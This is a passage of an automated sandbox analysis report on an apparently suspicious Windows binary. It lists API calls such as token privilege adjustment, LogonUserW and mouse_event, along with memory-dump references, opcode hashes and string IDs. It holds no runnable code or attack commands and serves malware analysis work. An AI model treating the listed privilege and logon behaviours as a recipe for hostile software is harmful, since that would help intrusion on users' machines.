                                                          • Opcode ID: 882a2190ff7d6980e791180aca00643ad9fe7c0fa039f3a1e938d67232e863dc
                                                          • Instruction ID: 50c908c5dc4fc15aa2580ca09b9ccc8df93d0707ea1ae61750d7608ad17c8ad8
                                                          • Opcode Fuzzy Hash: 882a2190ff7d6980e791180aca00643ad9fe7c0fa039f3a1e938d67232e863dc
                                                          • Instruction Fuzzy Hash: A341F771904209BFEB109EA5DD89FBF77ACEB40314F10407FFA05B66C1DAB89E419658
                                                          APIs
                                                          • SetErrorMode.KERNEL32(00000001), ref: 003FB343
                                                          • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 003FB39D
                                                          • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 003FB3EA
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: ErrorMode$DiskFreeSpace
                                                          • String ID:
                                                          • API String ID: 1682464887-0
                                                          • Opcode ID: 90058b0f0c06e17e2261e855c91f4f90683cb034e1323e53034a4287259317be
                                                          • Instruction ID: 7da9d38a97bc786205767f816f716d7b0e2f16af4d0f58b30d2bc890cce8d5f6
                                                          • Opcode Fuzzy Hash: 90058b0f0c06e17e2261e855c91f4f90683cb034e1323e53034a4287259317be
                                                          • Instruction Fuzzy Hash: 49215E75A00518EFCB01EFA5D881AEDFBB8FF49310F1480AAE905AB351DB319916CB54
                                                          APIs
                                                            • Part of subcall function 003B0DB6: std::exception::exception.LIBCMT ref: 003B0DEC
                                                            • Part of subcall function 003B0DB6: __CxxThrowException@8.LIBCMT ref: 003B0E01
                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 003E882B
                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 003E8858
                                                          • GetLastError.KERNEL32 ref: 003E8865
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                          • String ID:
                                                          • API String ID: 1922334811-0
                                                          • Opcode ID: 27c97efc39a5ed9d3219766725ea51ea8099614a98f09e4456c3bf3fba611764
                                                          • Instruction ID: 92eaa95389b16e567b2370c2538d29ca4deaf621be6e8eb292520349083cffa6
                                                          • Opcode Fuzzy Hash: 27c97efc39a5ed9d3219766725ea51ea8099614a98f09e4456c3bf3fba611764
                                                          • Instruction Fuzzy Hash: D7118FB2814204AFE719DFA5DC85D6BB7FCEB44714B20862EF85997651EB30BC418B60
                                                          APIs
                                                          • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 003E8774
                                                          • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 003E878B
                                                          • FreeSid.ADVAPI32(?), ref: 003E879B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: AllocateCheckFreeInitializeMembershipToken
                                                          • String ID:
                                                          • API String ID: 3429775523-0
                                                          • Opcode ID: 694450f05d5b405b2856550f9b46617b9fdb53b30005a1549b2466cfff63e490
                                                          • Instruction ID: a6ca3a1ac36d1e7ed46e74b0d490c71ec9ccf89ab64c7796a166157f708b3831
                                                          • Opcode Fuzzy Hash: 694450f05d5b405b2856550f9b46617b9fdb53b30005a1549b2466cfff63e490
                                                          • Instruction Fuzzy Hash: 61F04975A1130CBFDF00DFF4DD89AEEBBBCEF08211F1085B9A901E2191E6716A488B54
                                                          APIs
                                                          • __time64.LIBCMT ref: 003F889B
                                                            • Part of subcall function 003B520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,003F8F6E,00000000,?,?,?,?,003F911F,00000000,?), ref: 003B5213
                                                            • Part of subcall function 003B520A: __aulldiv.LIBCMT ref: 003B5233
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: Time$FileSystem__aulldiv__time64
                                                          • String ID: 0eE
                                                          • API String ID: 2893107130-3306559103
                                                          • Opcode ID: cc993116954a7a20e16ac664edfd076e2a82850357cb13ff476ec469d5631994
                                                          • Instruction ID: 62e1e1ff999e09bf238497a499c2bb364aac1bb28c0ca70e546eb2ebb95995b7
                                                          • Opcode Fuzzy Hash: cc993116954a7a20e16ac664edfd076e2a82850357cb13ff476ec469d5631994
                                                          • Instruction Fuzzy Hash: 3221A2326256148BC72ACF29D841A62B3E1EBA5311B698E6CD1F5CF2C1CA34A905CB54
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(?,?), ref: 003FC6FB
                                                          • FindClose.KERNEL32(00000000), ref: 003FC72B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: Find$CloseFileFirst
                                                          • String ID:
                                                          • API String ID: 2295610775-0
                                                          • Opcode ID: 6244a1a982b8827e117d1e744e9e3d4197916efc5317fe47e5de91817f0b1806
                                                          • Instruction ID: e3f879241bf0330858dabf6660114cf7af5dc2ec8e46836a47c4e2a25f96d08e
                                                          • Opcode Fuzzy Hash: 6244a1a982b8827e117d1e744e9e3d4197916efc5317fe47e5de91817f0b1806
                                                          • Instruction Fuzzy Hash: 521161726146049FDB10EF29D845A6AF7E9FF85324F00851EF9A9DB291DB30AC05CF81
                                                          APIs
                                                          • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00409468,?,0041FB84,?), ref: 003FA097
                                                          • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00409468,?,0041FB84,?), ref: 003FA0A9
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: ErrorFormatLastMessage
                                                          • String ID:
                                                          • API String ID: 3479602957-0
                                                          • Opcode ID: 0f82533732454de7aaaf70693eb09730bdae00841f31d6244936f23d51da6ab4
                                                          • Instruction ID: 21531fc501f80cac2d7d2a1011a678cc592b5c444ccc9bb1937cd23beb613f1f
                                                          • Opcode Fuzzy Hash: 0f82533732454de7aaaf70693eb09730bdae00841f31d6244936f23d51da6ab4
                                                          • Instruction Fuzzy Hash: 3EF0823515522EABDB229FA4DC48FEA776CBF09361F008165F919D7181DA309944CBA1
                                                          APIs
                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,003E8309), ref: 003E81E0
                                                          • CloseHandle.KERNEL32(?,?,003E8309), ref: 003E81F2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: AdjustCloseHandlePrivilegesToken
                                                          • String ID:
                                                          • API String ID: 81990902-0
                                                          • Opcode ID: a7fe6c991ca108341ddbdcc660ae2029111129282dace7a20bd4faa3268cd3c9
                                                          • Instruction ID: f4c11d6bf163afc64a693fab21d0d87528ec5f00a49748854e78538df7af0b2b
                                                          • Opcode Fuzzy Hash: a7fe6c991ca108341ddbdcc660ae2029111129282dace7a20bd4faa3268cd3c9
                                                          • Instruction Fuzzy Hash: F8E0EC72410A10AFE7262B61EC09DB77BEAEF04354714C93DF9AA84870DB62AC91DB14
                                                          APIs
                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,003B8D57,?,?,?,00000001), ref: 003BA15A
                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 003BA163
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled
                                                          • String ID:
                                                          • API String ID: 3192549508-0
                                                          • Opcode ID: b204520bd3807fbf9f685b35b174deb891ce1bbe50233ca1a02d3bef0f6fea60
                                                          • Instruction ID: 8e7ff411c88dc97c846234f077f839e82f7c08cd31c8fdd83557e5f5a65e7bb2
                                                          • Opcode Fuzzy Hash: b204520bd3807fbf9f685b35b174deb891ce1bbe50233ca1a02d3bef0f6fea60
                                                          • Instruction Fuzzy Hash: 06B0923105420CEBCA002B91EC09BC83F68FB44BA2F408030FA1D84C60CB6254568A99
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2a0da3cec45427c29c366baf77d352488ea966ef16dc4c9d68e3513027a988fc
                                                          • Instruction ID: 95ebee6f429dd16e35d53f27fc4c352d11ae166ed2f103f62cda4db0a7697046
                                                          • Opcode Fuzzy Hash: 2a0da3cec45427c29c366baf77d352488ea966ef16dc4c9d68e3513027a988fc
                                                          • Instruction Fuzzy Hash: 8632F222E29F014DD7239638DC32336A648AFB73C8F55E737E919B5DA6EB28D4834104
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 03c4411f1f463b4a88c913716c3b6929b8ea7a5336f44435f5b55bf866d5e79c
                                                          • Instruction ID: 690df17204e5132d6da8f01af7cb574e385cb8df2e42cf0e89a198d33557ebb9
                                                          • Opcode Fuzzy Hash: 03c4411f1f463b4a88c913716c3b6929b8ea7a5336f44435f5b55bf866d5e79c
                                                          • Instruction Fuzzy Hash: 4DB1F220E2AF414ED323A6398831336B65CAFBB2D5F91D72BFC1674D22EB2185934245
                                                          APIs
                                                          • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 003F4C4A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: mouse_event
                                                          • String ID:
                                                          • API String ID: 2434400541-0
                                                          • Opcode ID: 5e7114d780094d9d3e7e57b32fe01850afa386adcfd7c12525aa5b82efeb48c9
                                                          • Instruction ID: 56f31448c3c95ccd9362b47f46cf7e05394a8c1c30ec7410e8a5ee52fdebcb56
                                                          • Opcode Fuzzy Hash: 5e7114d780094d9d3e7e57b32fe01850afa386adcfd7c12525aa5b82efeb48c9
                                                          • Instruction Fuzzy Hash: ADD05E9116520D78EC1E0720AE0FF7B0108E300782FD2A19973028A4D2EC855C445030
                                                          APIs
                                                          • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,003E8389), ref: 003E87D1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: LogonUser
                                                          • String ID:
                                                          • API String ID: 1244722697-0
                                                          • Opcode ID: f982abca5a2c297575e500f11ec5bd52884190a42c1f55db2a78938db56ce4ab
                                                          • Instruction ID: 6dd07a3e79127b100e0fd94c1b98d335ca4a11bc76e8933b23e569cd42943fd5
                                                          • Opcode Fuzzy Hash: f982abca5a2c297575e500f11ec5bd52884190a42c1f55db2a78938db56ce4ab
                                                          • Instruction Fuzzy Hash: 46D09E3226450EABEF019EA4DD05EEE3B69EB04B01F408521FE15D51A1C775E935AB60
                                                          APIs
                                                          • SetUnhandledExceptionFilter.KERNEL32(?), ref: 003BA12A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled
                                                          • String ID:
                                                          • API String ID: 3192549508-0
                                                          • Opcode ID: 20977a1a18f8fe9c8d3e01b4d44c2929e439ec9a8a20de6627a153d9bb601342
                                                          • Instruction ID: f89e24cd733bd71cd7c4c5734ac160e1dc97d64598696c060dded247f6053abe
                                                          • Opcode Fuzzy Hash: 20977a1a18f8fe9c8d3e01b4d44c2929e439ec9a8a20de6627a153d9bb601342
                                                          • Instruction Fuzzy Hash: CBA0113000020CAB8A002B82EC08888BFACEA002A0B008030F80C80822CB32A8228A88
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ed1bb117c3e07666ea0687d4af9556cfa1d2c1c255f38919836c90f19752ef82
                                                          • Instruction ID: c47ed928606ac0e1d9e5fe04f9b88f99a2d83988a7210b832104938dfd119a9c
                                                          • Opcode Fuzzy Hash: ed1bb117c3e07666ea0687d4af9556cfa1d2c1c255f38919836c90f19752ef82
                                                          • Instruction Fuzzy Hash: 862246309045A6CBDF3B8B25C49477DB7A1FF42308F2A866AD9468B9D2DB34DC92C741
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                          • Instruction ID: e2501e4b892c4d3d24c910a294923a6626834f3894618c8bd164de33a323f2b9
                                                          • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                          • Instruction Fuzzy Hash: 7EC196362050930ADF6F463A84740BFFAA15EA27B935B075DD9B3CF9D4EE10C925D620
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                          • Instruction ID: d968f406965170b501da09d277095efc7ade7c5f828a7e88991a781b43c79f24
                                                          • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                          • Instruction Fuzzy Hash: AEC1D3322051930ADF2F463AC4341BFBBA15EA27B536B076DD5B3DB8D5EE20C925D620
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                          • Instruction ID: d8c954a90779c0ceee15c473faed5c44b7742830802e47336a8b54e00a0044df
                                                          • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                          • Instruction Fuzzy Hash: 96C1A23231519309DF2E8639C4340BEFBA15EA27B939B076DD5B3CB9D4EE20D925D620
                                                          APIs
                                                          • CharUpperBuffW.USER32(?,?,0041F910), ref: 00413627
                                                          • IsWindowVisible.USER32(?), ref: 0041364B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: BuffCharUpperVisibleWindow
                                                          • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                          • API String ID: 4105515805-45149045
                                                          • Opcode ID: 2321cbfac26bbb9ae1c1867ba0b37fde7f992a4e611b5f10b9d970df9aa2cf34
                                                          • Instruction ID: da09f7de021b4b10c1b55b31488f68c8d4c0b89a685bbdf955798f9bba495bdc
                                                          • Opcode Fuzzy Hash: 2321cbfac26bbb9ae1c1867ba0b37fde7f992a4e611b5f10b9d970df9aa2cf34
                                                          • Instruction Fuzzy Hash: 64D1A3702143019BCB05EF10C452AAF77E5AF55394F14886AF8865F3E2DB35DE8ACB4A
                                                          APIs
                                                          • SetTextColor.GDI32(?,00000000), ref: 0041A630
                                                          • GetSysColorBrush.USER32(0000000F), ref: 0041A661
                                                          • GetSysColor.USER32(0000000F), ref: 0041A66D
                                                          • SetBkColor.GDI32(?,000000FF), ref: 0041A687
                                                          • SelectObject.GDI32(?,00000000), ref: 0041A696
                                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 0041A6C1
                                                          • GetSysColor.USER32(00000010), ref: 0041A6C9
                                                          • CreateSolidBrush.GDI32(00000000), ref: 0041A6D0
                                                          • FrameRect.USER32(?,?,00000000), ref: 0041A6DF
                                                          • DeleteObject.GDI32(00000000), ref: 0041A6E6
                                                          • InflateRect.USER32(?,000000FE,000000FE), ref: 0041A731
                                                          • FillRect.USER32(?,?,00000000), ref: 0041A763
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 0041A78E
